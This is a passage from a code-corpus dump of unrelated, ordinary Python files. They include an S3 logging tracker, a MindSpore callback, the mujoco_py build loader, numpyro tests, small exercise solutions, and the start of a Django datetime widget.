filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_25854
|
"""
tracker.py
"""
import logging
import json
from datetime import datetime
import pytz
import boto3
from .clubhouse import Config
class Tracker:
S3_BUCKET = Config.config_to_dict(Config.load_config(), "S3", "bucket")
def data_dump(self, dump, source, channel=""):
log = f"Dumped {source} {channel}"
if source == "feed":
key = source
elif source == "channel":
key = f"channel_{dump.get('channel')}"
elif source == "channel_dict":
key = f"channel_{dump.get('channel_info').get('channel')}"
elif source == 'join':
key = f"join_{dump.get('channel')}"
else:
key = "unrecognized"
log = f"Unrecognized dumping source {source}"
logging.info(log)
response = self.s3_client_dump(dump, key)
return response
def s3_client_dump(self, dump, key):
"""
A function to set the interval decorator.
:param dump: The server data to be dumped
:type dump: any
:param key: A label for the dump file
:type key: str
:return: Server response
:rtype: bool
"""
if isinstance(dump, dict):
dump = json.dumps(dump)
s3_client = boto3.client("s3")
bucket = self.S3_BUCKET
timestamp = datetime.now(pytz.timezone('UTC')).isoformat()
key = f"{key}_{timestamp}.json"
run = s3_client.put_object(
Body=dump,
Bucket=bucket,
Key=key,
)
response = run.get("success")
logging.info(run)
return response
|
the-stack_0_25856
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""History Callback class."""
import numpy as np
from mindspore.common.tensor import Tensor
from ._callback import Callback
class History(Callback):
"""
Records the network outputs information into a `History` object.
The network outputs information will be the loss value if not custimizing the train network or eval network;
if the custimized network returns a `Tensor` or `numpy.ndarray`, the mean value of network output
will be recorded, if the custimized network returns a `tuple` or `list`, the first element of network
outputs will be recorded.
Note:
Normally used in `mindspore.Model.train`.
Examples:
>>> from mindspore import Model, nn
>>> data = {"x": np.float32(np.random.rand(64, 10)), "y": np.random.randint(0, 5, (64,))}
>>> train_dataset = ds.NumpySlicesDataset(data=data).batch(32)
>>> net = nn.Dense(10, 5)
>>> crit = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
>>> opt = nn.Momentum(net.trainable_params(), 0.01, 0.9)
>>> history_cb = History()
>>> model = Model(network=net, optimizer=opt, loss_fn=crit, metrics={"recall"})
>>> model.train(2, train_dataset, callbacks=[history_cb])
>>> print(history_cb.epoch)
>>> print(history_cb.history)
[1, 2]
{'net_output': [1.607877, 1.6033841]}
"""
def __init__(self):
super(History, self).__init__()
self.history = {}
def begin(self, run_context):
"""
Initialize the `epoch` property at the begin of training.
Args:
run_context (RunContext): Context of the `mindspore.Model.train/eval`.
"""
self.epoch = []
def epoch_end(self, run_context):
"""
Records the first element of network outputs at the end of epoch.
Args:
run_context (RunContext): Context of the `mindspore.Model.train/eval`.
"""
cb_params = run_context.original_args()
epoch = cb_params.get("cur_epoch_num", 1)
self.epoch.append(epoch)
net_output = cb_params.net_outputs
if isinstance(net_output, (tuple, list)):
if isinstance(net_output[0], Tensor) and isinstance(net_output[0].asnumpy(), np.ndarray):
net_output = net_output[0]
if isinstance(net_output, Tensor) and isinstance(net_output.asnumpy(), np.ndarray):
net_output = np.mean(net_output.asnumpy())
metrics = cb_params.get("metrics")
cur_history = {"net_output": net_output}
if metrics:
cur_history.update(metrics)
for k, v in cur_history.items():
self.history.setdefault(k, []).append(v)
|
the-stack_0_25859
|
from typing import List
import numpy as np
import tensorflow as tf
from tensorflow.keras.preprocessing.sequence import pad_sequences
from config import cfg
def mask_text_box(
fake_images: tf.float32, input_words: tf.int32, char_width: int
) -> tf.float32:
"""
Masks the text boxes outputted by the generator, in the cases where the length of the word is less than
cfg.max_char_number. Since each character is supposed to take 1/cfg.max_char_number of the width of the text box,
this function masks the extra width.
Parameters
----------
fake_images: Text boxes generated with our model.
input_words: Integer sequences obtained from the input words (initially strings) using the MAIN_CHAR_VECTOR.
char_width: Width of a single character.
Returns
-------
Masked fake_images
"""
mask = tf.tile(
tf.expand_dims(
tf.expand_dims(
tf.repeat(
tf.where(input_words == 0, 0.0, 1.0),
repeats=tf.tile([char_width], [tf.shape(input_words)[1]]),
axis=1,
),
1,
),
1,
),
[1, fake_images.shape[1], fake_images.shape[2], 1],
)
return fake_images * mask
def generator_output_to_uint8(fake_images: tf.float32) -> tf.uint8:
"""
Converts the output of the generator to uint8 RGB images.
Parameters
----------
fake_images: Text boxes generated with our model.
Returns
-------
Generated text boxes in a uint8 RGB format.
"""
fake_images = (tf.clip_by_value(fake_images, -1.0, 1.0) + 1.0) * 127.5
fake_images = tf.transpose(fake_images, perm=[0, 2, 3, 1])
return tf.cast(fake_images, tf.uint8)
def string_to_main_int_sequence(words_list: List[str]) -> np.ndarray:
"""
Converts input strings to integer sequences using the main character vector, and pad them if their length are less
than cfg.max_char_number.
Parameters
----------
words_list: List of words to generate
Returns
-------
Integer sequences obtained from the input words (initially strings) using the MAIN_CHAR_VECTOR.
"""
int_sequence = cfg.char_tokenizer.main.texts_to_sequences(words_list)
# First element is 1 so remove 1 to each element to match embedding shape
return (
pad_sequences(int_sequence, maxlen=cfg.max_char_number, value=1, padding="post")
- 1
)
def string_to_aster_int_sequence(words_list: List[str]) -> np.ndarray:
"""
Converts input strings to integer sequences using aster's character vector, and pad them if their length are less
than cfg.max_char_number.
Parameters
----------
words_list: List of words to generate
Returns
-------
Integer sequences obtained from the input words (initially strings) using the ASTER_CHAR_VECTOR.
"""
int_sequence = cfg.char_tokenizer.aster.texts_to_sequences(words_list)
return pad_sequences(
int_sequence, maxlen=cfg.max_char_number, value=1, padding="post"
)
|
the-stack_0_25860
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
ZMQ example using python3's asyncio
Vitalcoin should be started with the command line arguments:
vitalcoind -testnet -daemon \
-zmqpubhashblock=tcp://127.0.0.1:28332 \
-zmqpubrawtx=tcp://127.0.0.1:28332 \
-zmqpubhashtx=tcp://127.0.0.1:28332 \
-zmqpubhashblock=tcp://127.0.0.1:28332
We use the asyncio library here. `self.handle()` installs itself as a
future at the end of the function. Since it never returns with the event
loop having an empty stack of futures, this creates an infinite loop. An
alternative is to wrap the contents of `handle` inside `while True`.
The `@asyncio.coroutine` decorator and the `yield from` syntax found here
was introduced in python 3.4 and has been deprecated in favor of the `async`
and `await` keywords respectively.
A blocking example using python 2.7 can be obtained from the git history:
https://github.com/vitalcoin/vitalcoin/blob/37a7fe9e440b83e2364d5498931253937abe9294/contrib/zmq/zmq_sub.py
"""
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if not (sys.version_info.major >= 3 and sys.version_info.minor >= 4):
print("This example only works with Python 3.4 and greater")
exit(1)
port = 28332
class ZMQHandler():
def __init__(self):
self.loop = zmq.asyncio.install()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
@asyncio.coroutine
def handle(self) :
msg = yield from self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"hashtx":
print('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body))
# schedule ourselves to receive the next message
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
|
the-stack_0_25865
|
"""
Copyright 2020 David Lenwell, Judo Security inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import ipaddress
import status
from httpx import exceptions
from functools import wraps
from exceptions import (
AuthError, ClientConnectionError, ClientError, NotFoundError, ServerError
)
logger = logging.getLogger(__name__)
def validate_ip_list(ip_list):
"""validate_ip_list
"""
invalid_list = []
for canidate in ip_list:
if not validate_ip(canidate):
invalid_list.append(canidate)
if len(invalid_list):
return(False, invalid_list)
return(True, invalid_list)
def validate_ip(ip):
"""validate_ip
"""
try:
ip = ipaddress.ip_address(ip)
except ValueError:
return(False)
return(True)
def validate_response(response):
"""validate_response
"""
error_suffix = " response={!r}".format(response)
if response.status_code in (status.HTTP_401_UNAUTHORIZED,
status.HTTP_403_FORBIDDEN):
raise AuthError("operation=auth_error," + error_suffix, response)
if response.status_code == status.HTTP_404_NOT_FOUND:
raise NotFoundError(
"operation=not_found_error," + error_suffix, response
)
if status.is_client_error(code=response.status_code):
raise ClientError("operation=client_error," + error_suffix, response)
if status.is_server_error(code=response.status_code):
raise ServerError("operation=server_error," + error_suffix, response)
def validate_input(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
response = f(*args, **kwargs)
except (exceptions.TimeoutException,) as exc:
logger.exception(exc)
raise ClientConnectionError() from exc
validate_response(response)
return response
return wrapper
def handle_request_error(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
response = f(*args, **kwargs)
except (exceptions.TimeoutException,) as exc:
logger.exception(exc)
raise ClientConnectionError() from exc
validate_response(response)
return response
return wrapper
def handle_async_request_error(f):
async def wrapper(*args, **kwargs):
try:
response = await f(*args, **kwargs)
except (exceptions.TimeoutException,) as exc:
logger.exception(exc)
raise ClientConnectionError() from exc
validate_response(response)
return response
return wrapper
|
the-stack_0_25866
|
# Solution to [Introduction to Sets](https://www.hackerrank.com/challenges/py-introduction-to-sets)
def average(array):
"""Returns the average of distinct heights."""
unique_vals = set(array)
return sum(unique_vals) / len(unique_vals)
# your code goes here
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().split()))
result = average(arr)
print(result)
|
the-stack_0_25867
|
import distutils
import os
import shutil
import sys
from distutils.core import Extension
from distutils.dist import Distribution
from distutils.sysconfig import customize_compiler
from os.path import abspath, dirname, exists, join, getmtime
from random import choice
from shutil import move
from string import ascii_lowercase
from importlib.machinery import ExtensionFileLoader
import glob
import numpy as np
from cffi import FFI
from Cython.Build import cythonize
from Cython.Distutils.old_build_ext import old_build_ext as build_ext
from mujoco_py.version import get_version
import subprocess
from mujoco_py.utils import discover_mujoco
def get_nvidia_lib_dir():
exists_nvidia_smi = subprocess.call("type nvidia-smi", shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
if not exists_nvidia_smi:
return None
docker_path = '/usr/local/nvidia/lib64'
if exists(docker_path):
return docker_path
paths = glob.glob('/usr/lib/nvidia-[0-9][0-9][0-9]')
paths = sorted(paths)
if len(paths) == 0:
return None
if len(paths) > 1:
print("Choosing the latest nvidia driver: %s, among %s" % (paths[-1], str(paths)))
return paths[-1]
def load_cython_ext(mjpro_path):
"""
Loads the cymj Cython extension. This is safe to be called from
multiple processes running on the same machine.
Cython only gives us back the raw path, regardless of whether
it found a cached version or actually compiled. Since we do
non-idempotent postprocessing of the DLL, be extra careful
to only do that once and then atomically move to the final
location.
"""
if ('glfw' in sys.modules and
'mujoco' in abspath(sys.modules["glfw"].__file__)):
print('''
WARNING: Existing glfw python module detected!
MuJoCo comes with its own version of GLFW, so it's preferable to use that one.
The easy solution is to `import mujoco_py` _before_ `import glfw`.
''')
lib_path = os.path.join(mjpro_path, "bin")
if sys.platform == 'darwin':
Builder = MacExtensionBuilder
elif sys.platform == 'linux':
_ensure_set_env_var("LD_LIBRARY_PATH", lib_path)
if os.getenv('MUJOCO_PY_FORCE_CPU') is None and get_nvidia_lib_dir() is not None:
_ensure_set_env_var("LD_LIBRARY_PATH", get_nvidia_lib_dir())
Builder = LinuxGPUExtensionBuilder
else:
Builder = LinuxCPUExtensionBuilder
elif sys.platform.startswith("win"):
var = "PATH"
if var not in os.environ or lib_path not in os.environ[var].split(";"):
raise Exception("Please add mujoco library to your PATH:\n"
"set %s=%s;%%%s%%" % (var, lib_path, var))
Builder = WindowsExtensionBuilder
else:
raise RuntimeError("Unsupported platform %s" % sys.platform)
builder = Builder(mjpro_path)
cext_so_path = builder.get_so_file_path()
if exists(cext_so_path):
try:
return load_dynamic_ext('cymj', cext_so_path)
except ImportError:
print("Import error. Trying to rebuild mujoco_py.")
cext_so_path = builder.build()
return load_dynamic_ext('cymj', cext_so_path)
def _ensure_set_env_var(var_name, lib_path):
paths = os.environ.get(var_name, "").split(":")
paths = [os.path.abspath(path) for path in paths]
if lib_path not in paths:
raise Exception("\nMissing path to your environment variable. \n"
"Current values %s=%s\n"
"Please add following line to .bashrc:\n"
"export %s=$%s:%s" % (var_name, os.environ.get(var_name, ""),
var_name, var_name, lib_path))
def load_dynamic_ext(name, path):
''' Load compiled shared object and return as python module. '''
loader = ExtensionFileLoader(name, path)
return loader.load_module()
class custom_build_ext(build_ext):
"""
Custom build_ext to suppress the "-Wstrict-prototypes" warning.
It arises from the fact that we're using C++. This seems to be
the cleanest way to get rid of the extra flag.
See http://stackoverflow.com/a/36293331/248400
"""
def build_extensions(self):
customize_compiler(self.compiler)
try:
self.compiler.compiler_so.remove("-Wstrict-prototypes")
except (AttributeError, ValueError):
pass
build_ext.build_extensions(self)
def fix_shared_library(so_file, name, library_path):
''' Used to fixup shared libraries on Linux '''
subprocess.check_call(['patchelf', '--remove-rpath', so_file])
ldd_output = subprocess.check_output(['ldd', so_file]).decode('utf-8')
if name in ldd_output:
subprocess.check_call(['patchelf', '--remove-needed', name, so_file])
subprocess.check_call(['patchelf', '--add-needed', library_path, so_file])
def manually_link_libraries(mjpro_path, raw_cext_dll_path):
''' Used to fix mujoco library linking on Mac '''
root, ext = os.path.splitext(raw_cext_dll_path)
final_cext_dll_path = root + '_final' + ext
# If someone else already built the final DLL, don't bother
# recreating it here, even though this should still be idempotent.
if (exists(final_cext_dll_path) and
getmtime(final_cext_dll_path) >= getmtime(raw_cext_dll_path)):
return final_cext_dll_path
tmp_final_cext_dll_path = final_cext_dll_path + '~'
shutil.copyfile(raw_cext_dll_path, tmp_final_cext_dll_path)
mj_bin_path = join(mjpro_path, 'bin')
# Fix the rpath of the generated library -- i lost the Stackoverflow
# reference here
from_mujoco_path = '@executable_path/libmujoco150.dylib'
to_mujoco_path = '%s/libmujoco150.dylib' % mj_bin_path
subprocess.check_call(['install_name_tool',
'-change',
from_mujoco_path,
to_mujoco_path,
tmp_final_cext_dll_path])
from_glfw_path = 'libglfw.3.dylib'
to_glfw_path = os.path.join(mj_bin_path, 'libglfw.3.dylib')
subprocess.check_call(['install_name_tool',
'-change',
from_glfw_path,
to_glfw_path,
tmp_final_cext_dll_path])
os.rename(tmp_final_cext_dll_path, final_cext_dll_path)
return final_cext_dll_path
class MujocoExtensionBuilder():
CYMJ_DIR_PATH = abspath(dirname(__file__))
def __init__(self, mjpro_path):
self.mjpro_path = mjpro_path
python_version = str(sys.version_info.major) + str(sys.version_info.minor)
self.version = '%s_%s_%s' % (get_version(), python_version, self.build_base())
self.extension = Extension(
'mujoco_py.cymj',
sources=[join(self.CYMJ_DIR_PATH, "cymj.pyx")],
include_dirs=[
self.CYMJ_DIR_PATH,
join(mjpro_path, 'include'),
np.get_include(),
],
libraries=['mujoco150'],
library_dirs=[join(mjpro_path, 'bin')],
extra_compile_args=[
'-fopenmp', # needed for OpenMP
'-w', # suppress numpy compilation warnings
],
extra_link_args=['-fopenmp'],
language='c')
def build(self):
built_so_file_path = self._build_impl()
new_so_file_path = self.get_so_file_path()
move(built_so_file_path, new_so_file_path)
return new_so_file_path
def build_base(self):
return self.__class__.__name__.lower()
def _build_impl(self):
dist = Distribution({
"script_name": None,
"script_args": ["build_ext"]
})
dist.ext_modules = cythonize([self.extension])
dist.include_dirs = []
dist.cmdclass = {'build_ext': custom_build_ext}
build = dist.get_command_obj('build')
# following the convention of cython's pyxbuild and naming
# base directory "_pyxbld"
build.build_base = join(self.CYMJ_DIR_PATH, 'generated',
'_pyxbld_%s' % (self.version))
dist.parse_command_line()
obj_build_ext = dist.get_command_obj("build_ext")
dist.run_commands()
built_so_file_path, = obj_build_ext.get_outputs()
return built_so_file_path
def get_so_file_path(self):
dir_path = abspath(dirname(__file__))
python_version = str(sys.version_info.major) + str(sys.version_info.minor)
return join(dir_path, "generated", "cymj_%s.so" % self.version)
class WindowsExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
os.environ["PATH"] += ";" + join(mjpro_path, "bin")
self.extension.sources.append(self.CYMJ_DIR_PATH + "/gl/dummyshim.c")
class LinuxCPUExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
self.extension.sources.append(
join(self.CYMJ_DIR_PATH, "gl", "osmesashim.c"))
self.extension.libraries.extend(['glewosmesa', 'OSMesa', 'GL'])
self.extension.runtime_library_dirs = [join(mjpro_path, 'bin')]
def _build_impl(self):
so_file_path = super()._build_impl()
# Removes absolute paths to libraries. Allows for dynamic loading.
fix_shared_library(so_file_path, 'libmujoco150.so', 'libmujoco150.so')
fix_shared_library(so_file_path, 'libglewosmesa.so', 'libglewosmesa.so')
return so_file_path
class LinuxGPUExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
self.extension.sources.append(self.CYMJ_DIR_PATH + "/gl/eglshim.c")
self.extension.include_dirs.append(self.CYMJ_DIR_PATH + '/vendor/egl')
self.extension.libraries.extend(['glewegl'])
self.extension.runtime_library_dirs = [join(mjpro_path, 'bin')]
def _build_impl(self):
so_file_path = super()._build_impl()
fix_shared_library(so_file_path, 'libOpenGL.so', 'libOpenGL.so.0')
fix_shared_library(so_file_path, 'libEGL.so', 'libEGL.so.1')
fix_shared_library(so_file_path, 'libmujoco150.so', 'libmujoco150.so')
fix_shared_library(so_file_path, 'libglewegl.so', 'libglewegl.so')
return so_file_path
class MacExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
self.extension.sources.append(self.CYMJ_DIR_PATH + "/gl/dummyshim.c")
self.extension.libraries.extend(['glfw.3'])
self.extension.define_macros = [('ONMAC', None)]
self.extension.runtime_library_dirs = [join(mjpro_path, 'bin')]
def _build_impl(self):
# Prefer GCC 6 for now since GCC 7 may behave differently.
c_compilers = ['/usr/local/bin/gcc-6', '/usr/local/bin/gcc-7']
available_c_compiler = None
for c_compiler in c_compilers:
if distutils.spawn.find_executable(c_compiler) is not None:
available_c_compiler = c_compiler
break
if available_c_compiler is None:
raise RuntimeError(
'Could not find GCC 6 or GCC 7 executable.\n\n'
'HINT: On OS X, install GCC 6 with '
'`brew install gcc --without-multilib`.')
os.environ['CC'] = available_c_compiler
so_file_path = super()._build_impl()
del os.environ['CC']
return manually_link_libraries(self.mjpro_path, so_file_path)
class MujocoException(Exception):
pass
def user_warning_raise_exception(warn_bytes):
'''
User-defined warning callback, which is called by mujoco on warnings.
Here we have two primary jobs:
- Detect known warnings and suggest fixes (with code)
- Decide whether to raise an Exception and raise if needed
More cases should be added as we find new failures.
'''
# TODO: look through test output to see MuJoCo warnings to catch
# and recommend. Also fix those tests
warn = warn_bytes.decode() # Convert bytes to string
if 'Pre-allocated constraint buffer is full' in warn:
raise MujocoException(warn + 'Increase njmax in mujoco XML')
if 'Pre-allocated contact buffer is full' in warn:
raise MujocoException(warn + 'Increase njconmax in mujoco XML')
raise MujocoException('Got MuJoCo Warning: {}'.format(warn))
def user_warning_ignore_exception(warn_bytes):
pass
class ignore_mujoco_warnings:
"""
Class to turn off mujoco warning exceptions within a scope. Useful for
large, vectorized rollouts.
"""
def __enter__(self):
self.prev_user_warning = cymj.get_warning_callback()
cymj.set_warning_callback(user_warning_ignore_exception)
return self
def __exit__(self, type, value, traceback):
cymj.set_warning_callback(self.prev_user_warning)
def build_fn_cleanup(name):
'''
Cleanup files generated by building callback.
Set the MUJOCO_PY_DEBUG_FN_BUILDER environment variable to disable cleanup.
'''
if not os.environ.get('MUJOCO_PY_DEBUG_FN_BUILDER', False):
for f in glob.glob(name + '*'):
try:
os.remove(f)
except PermissionError as e:
# This happens trying to remove libraries on appveyor
print('Error removing {}, continuing anyway: {}'.format(f, e))
def build_callback_fn(function_string, userdata_names=[]):
'''
Builds a C callback function and returns a function pointer int.
function_string : str
This is a string of the C function to be compiled
userdata_names : list or tuple
This is an optional list to defince convenience names
We compile and link and load the function, and return a function pointer.
See `MjSim.set_substep_callback()` for an example use of these callbacks.
The callback function should match the signature:
void fun(const mjModel *m, mjData *d);
Here's an example function_string:
```
"""
#include <stdio.h>
void fun(const mjModel* m, mjData* d) {
printf("hello");
}
"""
```
Input and output for the function pass through userdata in the data struct:
```
"""
void fun(const mjModel* m, mjData* d) {
d->userdata[0] += 1;
}
"""
```
`userdata_names` is expected to match the model where the callback is used.
These can bet set on a model with:
`model.set_userdata_names([...])`
If `userdata_names` is supplied, convenience `#define`s are added for each.
For example:
`userdata_names = ['my_sum']`
Will get gerenerated into the extra line:
`#define my_sum d->userdata[0]`
And prepended to the top of the function before compilation.
Here's an example that takes advantage of this:
```
"""
void fun(const mjModel* m, mjData* d) {
for (int i = 0; i < m->nu; i++) {
my_sum += d->ctrl[i];
}
}
"""
```
Note these are just C `#define`s and are limited in how they can be used.
After compilation, the built library containing the function is loaded
into memory and all of the files (including the library) are deleted.
To retain these for debugging set the `MUJOCO_PY_DEBUG_FN_BUILDER` envvar.
To save time compiling, these function pointers may be re-used by many
different consumers. They are thread-safe and don't acquire the GIL.
See the file `tests/test_substep.py` for additional examples,
including an example which iterates over contacts to compute penetrations.
'''
assert isinstance(userdata_names, (list, tuple)), \
'invalid userdata_names: {}'.format(userdata_names)
ffibuilder = FFI()
ffibuilder.cdef('extern uintptr_t __fun;')
name = '_fn_' + ''.join(choice(ascii_lowercase) for _ in range(15))
source_string = '#include <mujoco.h>\n'
# Add defines for each userdata to make setting them easier
for i, data_name in enumerate(userdata_names):
source_string += '#define {} d->userdata[{}]\n'.format(data_name, i)
source_string += function_string
source_string += '\nuintptr_t __fun = (uintptr_t) fun;'
# Link against mujoco so we can call mujoco functions from within callback
ffibuilder.set_source(name, source_string,
include_dirs=[join(mjpro_path, 'include')],
library_dirs=[join(mjpro_path, 'bin')],
libraries=['mujoco150'])
# Catch compilation exceptions so we can cleanup partial files in that case
try:
library_path = ffibuilder.compile(verbose=True)
except Exception as e:
build_fn_cleanup(name)
raise e
# On Mac the MuJoCo library is linked strangely, so we have to fix it here
if sys.platform == 'darwin':
fixed_library_path = manually_link_libraries(mjpro_path, library_path)
move(fixed_library_path, library_path) # Overwrite with fixed library
module = load_dynamic_ext(name, library_path)
# Now that the module is loaded into memory, we can actually delete it
build_fn_cleanup(name)
return module.lib.__fun
def activate():
functions.mj_activate(key_path)
mjpro_path, key_path = discover_mujoco()
cymj = load_cython_ext(mjpro_path)
# Trick to expose all mj* functions from mujoco in mujoco_py.*
class dict2(object):
pass
functions = dict2()
for func_name in dir(cymj):
if func_name.startswith("_mj"):
setattr(functions, func_name[1:], getattr(cymj, func_name))
# Set user-defined callbacks that raise assertion with message
cymj.set_warning_callback(user_warning_raise_exception)
|
the-stack_0_25868
|
import numpy
# First process input data
with open('input.txt') as f:
input = f.read().splitlines()
list_of_lines = []
# Parse input: first split into two coordinates, then split into X and Y
for i, line in enumerate(input):
pos1 = input[i].split(' -> ')[0]
pos2 = input[i].split(' -> ')[1]
x1 = int(pos1.split(',')[0])
y1 = int(pos1.split(',')[1])
x2 = int(pos2.split(',')[0])
y2 = int(pos2.split(',')[1])
list_of_lines.append([[x1, y1], [x2, y2]])
def determine_grid_size(list_of_lines):
max_x = 0
max_y = 0
for line in list_of_lines:
for p, pos in enumerate(line):
if line[p][0] > max_x:
max_x = line[p][0]
if line[p][1] > max_y:
max_y = line[p][1]
return [max_x, max_y]
def draw_line_in_matrix(matrix, line):
output = matrix
x1 = line[0][0]
y1 = line[0][1]
x2 = line[1][0]
y2 = line[1][1]
delta_x = x2 - x1
delta_y = y2 - y1
# Horizontal line
if delta_x == 0:
length = delta_y
# Inverted line
inverted = length < 0
if inverted:
length *= -1
for i in range(length + 1):
if inverted:
output[x1][y1 - i] += 1
else:
output[x1][y1 + i] += 1
# Vertical line
elif delta_y == 0:
length = delta_x
# Inverted line
inverted = length < 0
if inverted:
length *= -1
for i in range(length + 1):
if inverted:
output[x1 - i][y1] += 1
else:
output[x1 + i][y1] += 1
return(output)
def count_overlaps_in_matrix(matrix):
overlaps = 0
for x, row in enumerate(matrix):
for y, col in enumerate(matrix[x]):
if matrix[x][y] >= 2:
overlaps += 1
return(overlaps)
# Create empty matrix and start drawing lines
matrix = numpy.zeros((determine_grid_size(list_of_lines)[0]+1, determine_grid_size(list_of_lines)[1]+1))
for line in list_of_lines:
matrix = draw_line_in_matrix(matrix, line)
print(count_overlaps_in_matrix(matrix))
|
the-stack_0_25870
|
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import pickle
import pytest
from jax import random, test_util
import jax.numpy as jnp
import numpyro
import numpyro.distributions as dist
from numpyro.infer import (
HMC,
HMCECS,
MCMC,
NUTS,
SA,
BarkerMH,
DiscreteHMCGibbs,
MixedHMC,
)
def normal_model():
numpyro.sample("x", dist.Normal(0, 1))
def bernoulli_model():
numpyro.sample("x", dist.Bernoulli(0.5))
def logistic_regression():
data = jnp.arange(10)
x = numpyro.sample("x", dist.Normal(0, 1))
with numpyro.plate("N", 10, subsample_size=2):
batch = numpyro.subsample(data, 0)
numpyro.sample("obs", dist.Bernoulli(logits=x), obs=batch)
@pytest.mark.parametrize("kernel", [BarkerMH, HMC, NUTS, SA])
def test_pickle_hmc(kernel):
mcmc = MCMC(kernel(normal_model), 10, 10)
mcmc.run(random.PRNGKey(0))
pickled_mcmc = pickle.loads(pickle.dumps(mcmc))
test_util.check_close(mcmc.get_samples(), pickled_mcmc.get_samples())
@pytest.mark.parametrize("kernel", [DiscreteHMCGibbs, MixedHMC])
def test_pickle_discrete_hmc(kernel):
mcmc = MCMC(kernel(HMC(bernoulli_model)), 10, 10)
mcmc.run(random.PRNGKey(0))
pickled_mcmc = pickle.loads(pickle.dumps(mcmc))
test_util.check_close(mcmc.get_samples(), pickled_mcmc.get_samples())
def test_pickle_hmcecs():
mcmc = MCMC(HMCECS(NUTS(logistic_regression)), 10, 10)
mcmc.run(random.PRNGKey(0))
pickled_mcmc = pickle.loads(pickle.dumps(mcmc))
test_util.check_close(mcmc.get_samples(), pickled_mcmc.get_samples())
|
the-stack_0_25873
|
# Collaborators (including web sites where you got help: (enter none if you didn't need help)
# https://www.w3schools.com/python/python_operators.asp
# I used the one above to learn what the % operator does (This assingment became a lot easier after I learned that this exists :)
# https://www.mathsisfun.com/definitions/modulo-operation.html
# I used the one above to actually learn what modulo is because I have never used it before
def find_gcf(x,y): # Do not change function name!
# User code goes here
if x > y:
number = y
else:
number = x
for i in range(1, number + 1):
if((x % i == 0) and (y % i == 0)):
gcf = i
return gcf
if __name__ == '__main__':
# Test your code with this first
# Change the argument to try different values
x = int(input("Enter a number: "))
y = int(input("Enter another number: "))
print(find_gcf(x,y))
# After you are satisfied with your results, use input() to prompt the user for two values:
#x = int(input("Enter a number: "))
#y = int(input("Enter another number: "))
|
the-stack_0_25874
|
__author__ = 'Alfredo Saglimbeni'
from datetime import datetime
import re
import uuid
from django.forms import forms, widgets
from django.forms.widgets import MultiWidget, DateTimeInput, DateInput, TimeInput
from django.utils.formats import get_format, get_language
from django.utils.safestring import mark_safe
from django.utils.six import string_types
try:
from django.forms.widgets import to_current_timezone
except ImportError:
to_current_timezone = lambda obj: obj # passthrough, no tz support
# This should be updated as more .po files are added to the datetime picker javascript code
supported_languages = set([
'ar',
'bg',
'ca', 'cs',
'da', 'de',
'ee', 'el', 'es','eu',
'fi', 'fr',
'he', 'hr', 'hu',
'id', 'is', 'it',
'ja',
'ko', 'kr',
'lt', 'lv',
'ms',
'nb', 'nl', 'no',
'pl', 'pt-BR', 'pt',
'ro', 'rs', 'rs-latin', 'ru',
'sk', 'sl', 'sv', 'sw',
'th', 'tr',
'ua', 'uk',
'zh-CN', 'zh-TW',
])
def get_supported_language(language_country_code):
"""Helps us get from django's 'language-countryCode' to the datepicker's 'language' if we
possibly can.
If we pass the django 'language_countryCode' through untouched then it might not
match an exact language string supported by the datepicker and would default to English which
would be worse than trying to match the language part.
"""
# Catch empty strings in case one sneeks in
if not language_country_code:
return 'en'
# Check full language & country code against the supported languages as there are dual entries
# in the list eg. zh-CN (assuming that is a language country code)
if language_country_code in supported_languages:
return language_country_code
